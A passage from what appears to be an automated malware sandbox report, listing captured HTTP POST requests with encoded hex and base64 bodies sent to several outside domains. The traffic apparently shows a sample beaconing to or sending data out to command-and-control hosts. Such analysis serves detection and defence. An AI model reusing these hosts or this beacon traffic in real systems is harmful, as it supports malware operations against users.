75 67 35 72 78 64 79 38 55 42 33 44 41 65 66 36 56 6e 53 41 4e 49 4e 54 6b 45 36 77 38 4c 41 64 42 32 62 72 38 4a 47 78 4e 64 59 38 68 6a 39 77 4b 66 41 69 4d 56 65 65 59 70 41 70 41 67 70 59 72 78 54 4b 4a 6a 7a 4b 36 4f 6a 32 6b 36 47 44 54 2b 6d 30 47 45 4b 74 73 76 76 63 50 78 52 6f 75 79 69 42 62 54 48 6c 71 51 3d 3d Data Ascii: 2sf19+ck18u7SPQMlt2e6bCLIv1dH1VMCw9Q0t72ZtCFum7eZerVSwso74RsItaV80bjMngNGW1YVjZ02SjeYtLPNHp7YBDQUeCGjK0jPCNnF3RANWwoxjg/5rom0SrDjVdE2B/eQhynOBQIpHpdTn466UPqLTBc7DaTREop0W/E5U9Y02CJg/TLGj3mUyUUnsScpaFjR5KIKCWCAw2C6BevrxTYteHndQI5CUoSr2DOVYXMFwLjmvrX+YThoBV7fD2hlwtdHDLKUf8WVVy9IFH5nal50E/iya/bssrTUA7gMjO9xtzsw28HlpydgJJfGtAU+DdVpeUSu/5GobBU6NLHaMBCR4iB2iYzbI4N+RXY5Z4naWLx+MSFsXtNeUBIgu80QQ1m67vTB93e4FU3bytZCTjNuEl8OeoVjpmfiO2h4x9boJY/xfr4F0Zq7pKah2XBElBbP7sv+/2AkeMm315ve9PYDv1A8Uq4ug5rxdy8UB3DAef6VnSANINTkE6w8LAdB2br8JGxNdY8hj9wKfAiMVeeYpApAgpYrxTKJjzK6Oj2k6GDT+m0GEKtsvvcPxRouyiBbTHlqQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.11tochi.netCache-Control: no-cacheData Raw: 4d 31 64 71 6a 41 63 34 2f 63 73 70 64 58 55 6c 4e 70 56 4d 39 64 43 72 4a 4e 54 39 73 46 30 7a 4b 38 52 44 62 61 66 6a 50 4e 4e 33 2b 79 64 73 63 54 48 47 6a 7a 35 65 4e 49 31 48 75 4d 4f 56 62 6d 51 6c 58 74 5a 6f 49 78 4b 6e 64 41 52 44 6e 44 32 6f 44 4b 74 48 67 49 78 58 31 58 77 53 52 53 45 54 49 6b 2f 68 47 32 74 5a 58 76 51 32 61 58 79 45 49 46 66 45 69 48 67 51 36 39 7a 41 55 68 6d 48 69 57 4c 4d 65 77 47 44 36 33 64 4c 6a 46 39 50 45 67 5a 55 4d 6d 58 78 4c 64 33 52 38 6d 44 70 34 6e 39 68 55 78 63 35 7a 6d 71 65 74 78 45 54 66 4d 6d 36 53 41 56 75 38 69 53 54 6e 4f 5a 4a 79 74 75 34 32 59 44 31 4b 50 30 36 6b 38 6f 4c 75 53 43 75 51 4a 39 6f 65 42 70 45 58 34 71 2f 78 47 34 4a 6d 6b 54 38 39 57 77 76 68 33 34 6a 75 43 32 67 36 51 51 39 68 42 64 74 46 35 5a 6e 53 43 48 41 31 49 66 33 64 6c 44 4e 68 53 45 69 34 6a 50 4f 7a 52 2f 4e 45 46 4d 58 4e 55 36 41 73 42 67 55 34 79 61 57 67 53 35 78 37 58 30 51 39 77 4d 79 4f 2b 38 4a 49 79 4d 4b 75 65 78 5a 37 6a 42 37 71 2f 4e 68 6e 6f 4a 59 6f 2b 70 64 43 77 6d 58 53 59 75 65 53 70 6d 67 74 78 74 56 56 55 6e 6b 76 50 42 74 43 4c 36 70 79 41 77 59 7a 54 75 54 73 55 61 57 6e 79 4f 4d 6a 45 66 76 66 58 56 33 77 33 4b 76 6c 68 4a 32 44 6a 6a 38 4c 73 4a 47 72 2f 5a 42 51 59 54 2f 79 67 75 2f 44 59 4b 76 79 39 6e 44 47 64 47 75 5a 6f 45 35 53 73 32 54 41 71 66 35 62 61 59 5a 6b 54 69 37 70 55 4d 34 72 61 72 72 58 76 4a 2f 52 35 73 61 34 6b 43 61 4e 6a 36 46 7a 44 4a 6c 49 2b 78 75 55 6e 4e 6b 71 30 35 71 6f 66 34 7a 6b 61 77 74 50 48 67 74 75 6b 72 39 4b 65 6c 49 35 37 45 57 48 4e 7a 43 69 42 68 72 4e 6f 44 66 6a 43 53 34 4a 50 4f 78 42 4b 44 79 Data Ascii: M1dqjAc4/cspdXUlNpVM9dCrJNT9sF0zK8RDbafjPNN3+ydscTHGjz5eNI1HuMOVbmQlXtZoIxKndARDnD2oDKtHgIxX1XwSRSETIk/hG2tZXvQ2aXyEIFfEiHgQ69zAUhmHiWLMewGD63dLjF9PEgZUMmXxLd3R8mDp4n9hUxc5zmqetxETfMm6SAVu8iSTnOZJytu42YD1KP06k8oLuSCuQJ9oeBpEX4q/xG4JmkT89Wwvh34juC2g6QQ9hBdtF5ZnSCHA1If3dlDNhSEi4jPOzR/NEFMXNU6AsBgU4yaWgS5x7X0Q9wMyO+8JIyMKuexZ7jB7q/NhnoJYo+pdCwmXSYueSpmgtxtVVUnkvPBtCL6pyAwYzTuTsUaWnyOMjEfvfXV3w3KvlhJ2Djj8LsJGr/ZBQYT/ygu/DYKvy9nDGdGuZoE5Ss2TAqf5baYZkTi7pUM4rarrXvJ/R5sa4kCaNj6FzDJlI+xuUnNkq05qof4zkawtPHgtukr9KelI57EWHNzCiBhrNoDfjCS4JPOxBKDy
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 6a 36 33 64 32 46 47 6b 47 4d 7a 79 64 78 37 6d 38 4a 45 51 64 36 71 38 57 52 63 50 72 4b 6a 4d 46 64 68 38 42 50 6c 76 50 46 4f 38 4f 74 45 71 76 64 55 61 39 63 48 70 33 6e 6b 33 6a 72 7a 4e 32 78 55 70 59 31 75 55 66 59 68 43 65 2b 30 78 2f 45 5a 41 77 41 41 7a 61 4d 6d 49 72 45 58 4d 36 64 6a 58 34 78 53 73 4c 56 2b 54 61 47 4b 6a 58 71 78 78 65 74 55 35 35 51 30 36 2f 5a 67 63 79 68 73 4e 46 2b 2b 34 67 37 4f 42 65 48 59 6f 51 36 67 78 48 78 70 41 6a 42 54 77 73 49 4f 62 67 52 69 33 2f 58 47 41 77 37 6e 32 6d 4e 5a 6f 4d 53 73 46 37 64 57 44 72 49 75 51 76 52 35 6f 61 39 7a 61 74 47 4b 68 46 74 64 4f 53 35 77 56 2f 79 39 36 2b 6b 4c 77 43 63 33 57 63 59 70 75 45 2f 75 6e 6a 56 34 68 54 51 38 56 61 6a 45 50 59 64 71 72 31 50 58 77 36 36 43 49 54 4a 6c 76 66 42 78 6b 64 4f 65 63 4b 41 70 58 74 57 62 52 5a 62 72 7a 78 35 42 32 52 71 78 73 38 2b 43 68 71 78 38 79 4e 38 30 62 4b 75 30 68 77 35 4f 39 73 6b 59 77 32 67 48 41 31 4d 68 33 44 74 34 72 6d 51 7a 51 61 64 62 57 73 38 63 53 39 48 7a 30 41 7a 75 49 4b 4d 4f 61 50 43 6a 6a 4e 4c 79 65 54 66 69 2b 6a 71 46 62 68 51 30 5a 38 68 4c 4a 46 2b 4f 6b 35 56 45 52 2b 77 57 4c 54 76 4b 77 30 63 48 73 5a 71 4f 35 6d 78 54 68 4a 64 54 32 69 62 31 69 32 66 72 43 4d 74 2f 6c 58 6d 4d 73 64 5a 65 36 4a 2b 42 34 48 78 53 73 79 68 58 79 41 44 63 4c 6c 59 6a 67 31 78 48 4b 57 47 53 34 6e 39 52 7a 43 43 70 4e 72 6a 4b 2f 6a 59 64 6c 48 48 33 45 2f 34 47 41 49 32 61 47 55 6d 69 2f 4e 56 79 75 63 30 53 34 45 41 33 61 42 78 6e 2b 49 69 6c 57 44 6b 4e 38 70 37 41 30 55 7a 78 46 2b 77 6c 37 78 79 2f 75 31 36 6d 59 39 53 55 36 4b 56 36 5a 6a 33 56 77 4b 61 6a 6c 37 58 6b 4a Data Ascii: j63d2FGkGMzydx7m8JEQd6q8WRcPrKjMFdh8BPlvPFO8OtEqvdUa9cHp3nk3jrzN2xUpY1uUfYhCe+0x/EZAwAAzaMmIrEXM6djX4xSsLV+TaGKjXqxxetU55Q06/ZgcyhsNF++4g7OBeHYoQ6gxHxpAjBTwsIObgRi3/XGAw7n2mNZoMSsF7dWDrIuQvR5oa9zatGKhFtdOS5wV/y96+kLwCc3WcYpuE/unjV4hTQ8VajEPYdqr1PXw66CITJlvfBxkdOecKApXtWbRZbrzx5B2Rqxs8+Chqx8yN80bKu0hw5O9skYw2gHA1Mh3Dt4rmQzQadbWs8cS9Hz0AzuIKMOaPCjjNLyeTfi+jqFbhQ0Z8hLJF+Ok5VER+wWLTvKw0cHsZqO5mxThJdT2ib1i2frCMt/lXmMsdZe6J+B4HxSsyhXyADcLlYjg1xHKWGS4n9RzCCpNrjK/jYdlHH3E/4GAI2aGUmi/NVyuc0S4EA3aBxn+IilWDkN8p7A0UzxF+wl7xy/u16mY9SU6KV6Zj3VwKajl7XkJ
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 4a 37 65 62 79 31 4f 47 49 4d 77 58 7a 68 64 55 47 74 65 31 72 66 79 72 4e 70 41 35 43 36 58 77 4e 2b 6e 56 43 6f 2b 6e 72 2b 39 43 73 67 65 35 6b 44 4d 63 4d 53 55 74 44 73 65 51 6f 6f 44 39 75 66 69 45 42 67 77 6d 46 39 49 39 6c 4a 43 4c 63 47 56 49 70 58 2f 73 57 44 6f 32 35 33 2b 4e 4c 62 73 7a 56 45 5a 38 6b 74 58 45 52 47 59 39 2f 75 62 4c 37 48 2b 59 32 2b 6e 64 6a 68 73 55 53 67 70 51 61 44 66 74 41 53 39 34 57 38 76 72 6f 59 71 39 47 6c 64 6c 75 76 5a 75 66 31 63 55 6e 6b 4e 79 56 41 4c 51 57 57 75 64 43 58 41 41 38 66 50 30 35 4d 2b 79 4e 64 33 6f 67 43 31 6c 4b 52 4e 38 49 77 72 76 59 65 77 51 63 47 4b 52 33 75 41 59 4d 45 36 33 46 31 72 5a 67 75 33 76 41 61 53 36 5a 48 74 75 6c 37 79 75 30 64 4a 57 34 2f 51 36 47 4e 34 61 32 46 38 41 41 4e 52 48 57 38 6c 5a 34 32 61 69 56 75 44 57 58 31 66 47 49 30 39 34 4c 66 4a 6c 61 67 6f 55 55 2f 73 59 74 71 77 47 67 56 67 44 7a 64 4d 77 48 2b 4e 69 42 4c 46 42 34 76 4f 70 79 68 55 49 4a 4d 43 46 5a 56 41 30 68 73 46 79 54 43 72 33 79 66 79 37 72 61 4c 73 6b 6e 47 36 54 32 69 55 30 37 79 6a 35 4a 6a 4b 62 59 4d 73 79 30 56 2f 34 67 54 6c 2b 42 71 39 58 6e 55 51 7a 38 47 67 41 68 49 53 78 69 73 33 37 4c 55 6a 64 6c 77 46 50 6b 31 65 45 42 35 53 4d 64 4f 32 37 33 46 6e 55 34 77 66 76 46 6c 57 74 75 73 37 65 4a 59 32 6f 52 47 74 49 72 45 5a 6f 58 6f 52 37 59 38 2f 68 4a 79 46 47 59 7a 33 33 6d 74 6f 53 78 6c 6b 51 49 6a 75 68 52 33 43 75 65 5a 68 68 6b 34 72 44 31 4e 41 38 6b 68 6d 37 51 4e 66 38 53 58 65 79 39 77 75 74 70 6d 32 76 6d 31 62 62 36 37 48 50 65 65 33 44 64 75 6b 56 58 55 45 7a 47 6c 49 32 4e 6c 41 33 48 77 57 46 30 46 32 56 57 71 48 45 70 64 4c 2b 72 69 62 51 4a 4b 65 44 56 46 57 6a 4c 52 47 67 73 37 64 Data Ascii: J7eby1OGIMwXzhdUGte1rfyrNpA5C6XwN+nVCo+nr+9Csge5kDMcMSUtDseQooD9ufiEBgwmF9I9lJCLcGVIpX/sWDo253+NLbszVEZ8ktXERGY9/ubL7H+Y2+ndjhsUSgpQaDftAS94W8vroYq9GldluvZuf1cUnkNyVALQWWudCXAA8fP05M+yNd3ogC1lKRN8IwrvYewQcGKR3uAYME63F1rZgu3vAaS6ZHtul7yu0dJW4/Q6GN4a2F8AANRHW8lZ42aiVuDWX1fGI094LfJlagoUU/sYtqwGgVgDzdMwH+NiBLFB4vOpyhUIJMCFZVA0hsFyTCr3yfy7raLsknG6T2iU07yj5JjKbYMsy0V/4gTl+Bq9XnUQz8GgAhISxis37LUjdlwFPk1eEB5SMdO273FnU4wfvFlWtus7eJY2oRGtIrEZoXoR7Y8/hJyFGYz33mtoSxlkQIjuhR3CueZhhk4rD1NA8khm7QNf8SXey9wutpm2vm1bb67HPee3DdukVXUEzGlI2NlA3HwWF0F2VWqHEpdL+ribQJKeDVFWjLRGgs7d
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 4a 37 65 62 79 31 4f 47 49 4d 77 58 7a 68 64 55 47 74 65 31 72 66 79 72 4e 70 41 35 43 36 58 77 4e 2b 6e 56 43 6f 2b 6e 72 2b 39 43 73 67 65 35 6b 44 4d 63 4d 53 55 74 44 73 65 51 6f 6f 44 39 75 66 69 45 42 67 77 6d 46 39 49 39 6c 4a 43 4c 63 47 56 49 70 58 2f 73 57 44 6f 32 35 33 2b 4e 4c 62 73 7a 56 45 5a 38 6b 74 58 45 52 47 59 39 2f 75 62 4c 37 48 2b 59 32 2b 6e 64 6a 68 73 55 53 67 70 51 61 44 66 74 41 53 39 34 57 38 76 72 6f 59 71 39 47 6c 64 6c 75 76 5a 75 66 31 63 55 6e 6b 4e 79 56 41 4c 51 57 57 75 64 43 58 41 41 38 66 50 30 35 4d 2b 79 4e 64 33 6f 67 43 31 6c 4b 52 4e 38 49 77 72 76 59 65 77 51 63 47 4b 52 33 75 41 59 4d 45 36 33 46 31 72 5a 67 75 33 76 41 61 53 36 5a 48 74 75 6c 37 79 75 30 64 4a 57 34 2f 51 36 47 4e 34 61 32 46 38 41 41 4e 52 48 57 38 6c 5a 34 32 61 69 56 75 44 57 58 31 66 47 49 30 39 34 4c 66 4a 6c 61 67 6f 55 55 2f 73 59 74 71 77 47 67 56 67 44 7a 64 4d 77 48 2b 4e 69 42 4c 46 42 34 76 4f 70 79 68 55 49 4a 4d 43 46 5a 56 41 30 68 73 46 79 54 43 72 33 79 66 79 37 72 61 4c 73 6b 6e 47 36 54 32 69 55 30 37 79 6a 35 4a 6a 4b 62 59 4d 73 79 30 56 2f 34 67 54 6c 2b 42 71 39 58 6e 55 51 7a 38 47 67 41 68 49 53 78 69 73 33 37 4c 55 6a 64 6c 77 46 50 6b 31 65 45 42 35 53 4d 64 4f 32 37 33 46 6e 55 34 77 66 76 46 6c 57 74 75 73 37 65 4a 59 32 6f 52 47 74 49 72 45 5a 6f 58 6f 52 37 59 38 2f 68 4a 79 46 47 59 7a 33 33 6d 74 6f 53 78 6c 6b 51 49 6a 75 68 52 33 43 75 65 5a 68 68 6b 34 72 44 31 4e 41 38 6b 68 6d 37 51 4e 66 38 53 58 65 79 39 77 75 74 70 6d 32 76 6d 31 62 62 36 37 48 50 65 65 33 44 64 75 6b 56 58 55 45 7a 47 6c 49 32 4e 6c 41 33 48 77 57 46 30 46 32 56 57 71 48 45 70 64 4c 2b 72 69 62 51 4a 4b 65 44 56 46 57 6a 4c 52 47 67 73 37 64 Data Ascii: J7eby1OGIMwXzhdUGte1rfyrNpA5C6XwN+nVCo+nr+9Csge5kDMcMSUtDseQooD9ufiEBgwmF9I9lJCLcGVIpX/sWDo253+NLbszVEZ8ktXERGY9/ubL7H+Y2+ndjhsUSgpQaDftAS94W8vroYq9GldluvZuf1cUnkNyVALQWWudCXAA8fP05M+yNd3ogC1lKRN8IwrvYewQcGKR3uAYME63F1rZgu3vAaS6ZHtul7yu0dJW4/Q6GN4a2F8AANRHW8lZ42aiVuDWX1fGI094LfJlagoUU/sYtqwGgVgDzdMwH+NiBLFB4vOpyhUIJMCFZVA0hsFyTCr3yfy7raLsknG6T2iU07yj5JjKbYMsy0V/4gTl+Bq9XnUQz8GgAhISxis37LUjdlwFPk1eEB5SMdO273FnU4wfvFlWtus7eJY2oRGtIrEZoXoR7Y8/hJyFGYz33mtoSxlkQIjuhR3CueZhhk4rD1NA8khm7QNf8SXey9wutpm2vm1bb67HPee3DdukVXUEzGlI2NlA3HwWF0F2VWqHEpdL+ribQJKeDVFWjLRGgs7d
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sclover3.comCache-Control: no-cacheData Raw: 4f 6e 56 2b 39 2b 54 6a 4f 73 79 2b 6c 66 2b 4a 66 31 31 39 55 37 65 49 39 70 6d 63 36 76 37 55 57 49 65 37 4e 73 64 31 47 59 36 5a 34 48 4e 59 63 53 6e 2b 74 59 31 32 31 6d 63 30 6b 73 7a 58 6a 57 64 43 67 48 6a 51 72 41 4b 34 51 35 75 39 35 64 39 6e 6f 35 75 73 63 6c 42 6e 67 73 64 61 56 66 6a 2f 70 78 71 37 55 53 62 70 47 47 6e 72 4a 37 4f 77 67 41 6a 58 4b 43 75 47 77 6c 6f 45 79 64 4e 55 56 6d 6c 52 45 32 48 7a 64 45 2b 72 61 36 45 59 66 4c 6b 76 49 77 74 54 33 75 4e 4e 49 54 52 38 58 37 72 37 7a 47 68 31 75 6b 2f 61 35 36 43 37 6b 52 59 6a 64 54 6e 30 42 4e 4e 47 2b 53 75 30 51 2f 77 44 50 62 2f 34 54 4c 62 43 6d 63 76 41 33 6a 47 39 50 76 72 63 54 76 79 50 66 53 56 35 6d 6a 7a 6b 43 57 52 59 67 54 77 63 79 48 61 30 6a 72 4b 4b 43 5a 41 2b 6c 6a 2f 7a 35 4b 45 6d 4c 67 6b 69 58 36 76 54 44 35 4b 54 64 78 6f 4a 4d 46 5a 2b 42 34 35 63 6b 47 42 65 38 2b 32 55 4d 30 30 55 6b 43 33 38 44 45 6d 63 54 2b 4e 38 70 2b 6f 72 4c 69 44 61 32 45 35 51 30 34 41 59 55 74 34 78 78 51 54 4f 59 61 46 34 36 4a 4a 64 76 48 6c 34 62 5a 7a 64 6d 4b 45 50 59 51 79 6d 4c 37 75 6c 63 42 77 44 2b 50 73 4a 37 5a 4e 77 73 34 55 56 65 78 66 68 57 72 54 50 67 49 65 65 55 6c 52 78 6c 79 6f 77 46 48 70 37 43 6f 71 70 31 50 7a 2b 4e 2b 42 34 73 6c 4b 57 6f 32 66 4e 39 2f 57 51 4d 64 59 66 4f 74 51 59 75 30 4f 35 33 53 76 77 41 71 58 59 69 2f 6d 76 71 77 65 30 57 50 45 71 71 78 34 31 6f 50 32 72 65 4b 34 44 76 57 42 44 48 44 71 4d 32 36 74 4c 75 65 65 56 4c 44 58 34 76 75 6f 68 54 39 36 33 71 34 68 73 59 7a 31 68 4d 79 73 72 76 64 75 43 6a 51 58 33 67 54 6f 59 74 78 61 4b 4f 74 63 57 45 72 71 38 58 59 42 36 59 45 2b 44 5a 36 67 6e 6c 52 6c 54 76 78 37 57 7a 76 36 31 68 4b 76 2b 33 66 51 44 61 78 4b 35 65 31 53 64 56 61 73 62 51 48 30 4a 41 44 39 69 70 37 4a 48 68 72 31 59 4c 4d 42 71 6f 4f 6f 3d Data Ascii: OnV+9+TjOsy+lf+Jf119U7eI9pmc6v7UWIe7Nsd1GY6Z4HNYcSn+tY121mc0kszXjWdCgHjQrAK4Q5u95d9no5usclBngsdaVfj/pxq7USbpGGnrJ7OwgAjXKCuGwloEydNUVmlRE2HzdE+ra6EYfLkvIwtT3uNNITR8X7r7zGh1uk/a56C7kRYjdTn0BNNG+Su0Q/wDPb/4TLbCmcvA3jG9PvrcTvyPfSV5mjzkCWRYgTwcyHa0jrKKCZA+lj/z5KEmLgkiX6vTD5KTdxoJMFZ+B45ckGBe8+2UM00UkC38DEmcT+N8p+orLiDa2E5Q04AYUt4xxQTOYaF46JJdvHl4bZzdmKEPYQymL7ulcBwD+PsJ7ZNws4UVexfhWrTPgIeeUlRxlyowFHp7Coqp1Pz+N+B4slKWo2fN9/WQMdYfOtQYu0O53SvwAqXYi/mvqwe0WPEqqx41oP2reK4DvWBDHDqM26tLueeVLDX4vuohT963q4hsYz1hMysrvduCjQX3gToYtxaKOtcWErq8XYB6YE+DZ6gnlRlTvx7Wzv61hKv+3fQDaxK5e1SdVasbQH0JAD9ip7JHhr1YLMBqoOo=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 69 77 41 57 5a 56 5a 56 33 70 4f 44 71 7a 61 33 4d 59 77 66 71 76 6c 6b 6b 54 44 32 6c 51 2b 78 36 75 61 4f 5a 71 6c 71 67 78 63 38 45 36 35 78 70 32 53 35 77 63 49 59 55 56 79 4a 46 49 52 75 74 56 37 74 6a 6e 6b 6f 4b 38 42 42 63 43 55 6d 2b 49 6b 59 71 55 72 6a 42 56 53 6c 68 7a 57 6e 4b 49 41 55 6a 47 6c 33 54 72 6b 52 6b 34 30 62 61 74 48 66 61 56 77 75 4c 43 73 46 30 75 52 39 56 54 78 66 32 4f 47 76 73 7a 53 63 41 2b 77 4f 67 46 7a 64 6f 32 6c 73 53 54 77 35 33 55 41 66 4b 73 76 78 54 37 58 4c 7a 30 73 58 32 56 74 4b 2b 6c 76 77 75 4b 55 6a 47 34 35 61 41 48 4f 68 73 44 78 4f 6e 4f 4e 4f 77 74 6b 76 39 33 46 36 74 41 59 51 62 6d 4a 72 64 31 33 44 6d 46 67 4a 4d 46 39 76 74 68 37 38 79 56 76 52 73 41 34 7a 42 45 7a 65 67 37 6c 62 62 47 77 79 69 66 4a 46 37 39 2f 77 55 2b 45 59 4c 74 42 64 4f 6c 7a 5a 56 68 39 62 4b 5a 4d 46 55 2f 46 59 57 35 53 50 4b 46 6a 39 79 4a 7a 78 74 7a 2b 37 45 67 4d 6a 4c 73 53 45 4a 43 68 55 46 54 6f 4b 50 5a 67 72 77 70 41 38 42 33 61 77 69 4c 70 4d 6a 76 4e 45 56 57 6b 65 46 78 78 73 52 6f 54 52 48 45 35 55 61 77 55 52 4b 39 77 38 33 77 4e 71 48 6a 35 78 64 75 6f 36 6b 5a 38 6c 64 70 63 57 4d 70 2f 4c 2b 49 44 4b 4b 35 61 77 72 49 74 70 38 6f 68 44 5a 6e 46 4e 34 32 55 77 43 72 79 68 70 4a 30 50 7a 35 52 33 7a 53 61 63 63 4d 71 47 58 55 6a 2b 68 35 79 73 41 76 63 39 65 4d 6f 74 57 61 6c 71 51 62 56 71 4e 78 72 63 78 48 74 79 33 57 59 30 6f 50 31 59 69 6d 48 47 37 59 35 32 74 59 64 58 6e 74 37 77 2b 32 4b 38 63 6e 5a 65 46 49 50 4f 6b 4e 5a 32 57 73 2b 72 68 6c 54 46 56 62 45 6d 46 53 50 4b 53 56 56 64 2b 62 5a 2f 50 4d 6a 52 78 38 66 36 48 4f 6d 50 6a 75 33 63 65 41 3d 3d Data Ascii: iwAWZVZV3pODqza3MYwfqvlkkTD2lQ+x6uaOZqlqgxc8E65xp2S5wcIYUVyJFIRutV7tjnkoK8BBcCUm+IkYqUrjBVSlhzWnKIAUjGl3TrkRk40batHfaVwuLCsF0uR9VTxf2OGvszScA+wOgFzdo2lsSTw53UAfKsvxT7XLz0sX2VtK+lvwuKUjG45aAHOhsDxOnONOwtkv93F6tAYQbmJrd13DmFgJMF9vth78yVvRsA4zBEzeg7lbbGwyifJF79/wU+EYLtBdOlzZVh9bKZMFU/FYW5SPKFj9yJzxtz+7EgMjLsSEJChUFToKPZgrwpA8B3awiLpMjvNEVWkeFxxsRoTRHE5UawURK9w83wNqHj5xduo6kZ8ldpcWMp/L+IDKK5awrItp8ohDZnFN42UwCryhpJ0Pz5R3zSaccMqGXUj+h5ysAvc9eMotWalqQbVqNxrcxHty3WY0oP1YimHG7Y52tYdXnt7w+2K8cnZeFIPOkNZ2Ws+rhlTFVbEmFSPKSVVd+bZ/PMjRx8f6HOmPju3ceA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 4d 65 45 47 5a 48 31 4d 33 70 50 2f 2f 31 66 72 4e 4b 4e 6e 79 62 61 52 35 62 36 72 4e 64 48 54 41 64 58 38 6a 6b 36 59 64 45 34 64 4e 34 2f 58 4e 59 6b 36 41 37 58 63 53 73 49 70 76 4b 61 46 57 31 51 6c 66 2f 7a 6f 37 6f 48 44 59 6e 65 68 4d 32 66 66 6b 65 45 68 4b 39 6b 71 43 53 39 51 6f 71 71 65 78 46 33 68 56 68 6b 50 2b 59 46 48 33 69 50 34 55 41 34 56 37 6d 64 4c 63 6c 4b 64 4f 48 4a 68 75 53 34 47 4f 4a 55 69 45 54 37 33 59 36 42 45 32 44 50 63 39 6f 69 58 75 4a 70 48 6e 76 54 39 76 65 39 76 2b 63 49 78 34 64 48 4b 70 69 63 6a 33 48 37 6d 74 70 6e 46 70 48 4b 4b 77 30 72 6f 44 66 31 64 57 4f 4b 6f 79 65 30 58 66 42 56 4d 5a 76 34 32 32 48 36 6a 32 37 6a 56 69 69 52 58 39 50 30 33 4c 66 4c 30 33 57 6e 65 30 57 79 76 33 4b 65 54 75 41 30 50 4c 58 67 2f 75 58 69 37 34 64 37 79 49 49 30 6b 70 2f 61 50 6b 33 73 4e 36 6b 39 79 77 38 6e 78 77 62 32 41 35 47 38 79 75 71 66 77 32 59 6c 77 6f 38 67 72 2f 58 68 46 62 62 76 57 67 50 33 67 42 78 6f 31 6d 64 69 68 67 4f 52 6d 70 73 75 6a 37 62 52 47 76 35 4e 62 51 57 4b 70 50 61 6c 71 32 4c 64 47 7a 63 61 56 46 6d 2b 5a 4e 33 30 4d 31 73 4d 78 34 59 78 72 72 64 62 52 56 66 32 74 79 42 55 4d 43 59 64 44 48 64 46 4e 61 36 34 49 61 6e 36 32 37 64 57 74 4d 76 6d 4d 5a 36 2f 6b 4f 59 33 73 75 50 54 75 43 52 4e 37 30 75 48 66 56 5a 7a 6b 4e 4c 64 5a 52 53 68 38 31 76 39 61 65 77 6a 48 2f 6b 56 42 39 31 76 42 30 4f 48 53 61 67 4f 44 2b 4f 51 6a 4e 30 39 38 7a 75 75 64 37 4d 69 70 39 36 53 43 61 56 53 45 6c 64 4c 5a 76 72 47 42 2b 34 36 44 45 7a 76 56 6d 62 77 66 57 76 30 4f 52 67 37 61 43 33 63 4d 75 48 30 6d 72 57 46 66 54 7a 34 35 63 77 7a 67 46 6d 52 72 66 66 48 34 38 50 41 4c 2b 41 4c 51 6c 67 6e 66 73 77 4e 75 6b 45 67 3d Data Ascii: MeEGZH1M3pP//1frNKNnybaR5b6rNdHTAdX8jk6YdE4dN4/XNYk6A7XcSsIpvKaFW1Qlf/zo7oHDYnehM2ffkeEhK9kqCS9QoqqexF3hVhkP+YFH3iP4UA4V7mdLclKdOHJhuS4GOJUiET73Y6BE2DPc9oiXuJpHnvT9ve9v+cIx4dHKpicj3H7mtpnFpHKKw0roDf1dWOKoye0XfBVMZv422H6j27jViiRX9P03LfL03Wne0Wyv3KeTuA0PLXg/uXi74d7yII0kp/aPk3sN6k9yw8nxwb2A5G8yuqfw2Ylwo8gr/XhFbbvWgP3gBxo1mdihgORmpsuj7bRGv5NbQWKpPalq2LdGzcaVFm+ZN30M1sMx4YxrrdbRVf2tyBUMCYdDHdFNa64Ian627dWtMvmMZ6/kOY3suPTuCRN70uHfVZzkNLdZRSh81v9aewjH/kVB91vB0OHSagOD+OQjN098zuud7Mip96SCaVSEldLZvrGB+46DEzvVmbwfWv0ORg7aC3cMuH0mrWFfTz45cwzgFmRrffH48PAL+ALQlgnfswNukEg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 68 75 75 76 61 74 2b 44 33 70 4e 67 34 79 56 64 50 6e 38 4e 53 47 68 5a 59 62 36 31 42 51 32 66 67 35 6c 6e 59 41 51 64 43 70 79 62 43 55 46 64 51 44 39 70 35 43 63 4d 72 72 37 54 65 30 74 6d 4c 32 71 61 4d 37 6d 55 6e 72 55 51 4a 45 35 6d 58 73 6f 57 35 61 4b 6a 76 31 4c 64 59 2b 57 6f 63 58 70 61 6a 74 76 2f 4c 57 49 4a 68 62 76 63 4f 58 50 56 53 53 4d 62 62 4f 52 72 6f 4b 68 77 67 59 56 6b 63 4c 62 33 6a 33 48 42 38 69 71 63 56 50 2b 70 79 7a 6d 48 73 78 52 7a 4e 32 4f 75 42 63 4e 52 54 2f 6a 6f 65 49 78 6a 6a 59 79 7a 33 75 38 2f 7a 70 70 74 2b 4a 55 48 54 34 4e 62 41 65 57 78 61 6b 45 47 69 59 61 55 6c 6b 36 72 50 58 4e 6f 66 33 78 2b 65 76 4c 58 54 34 4e 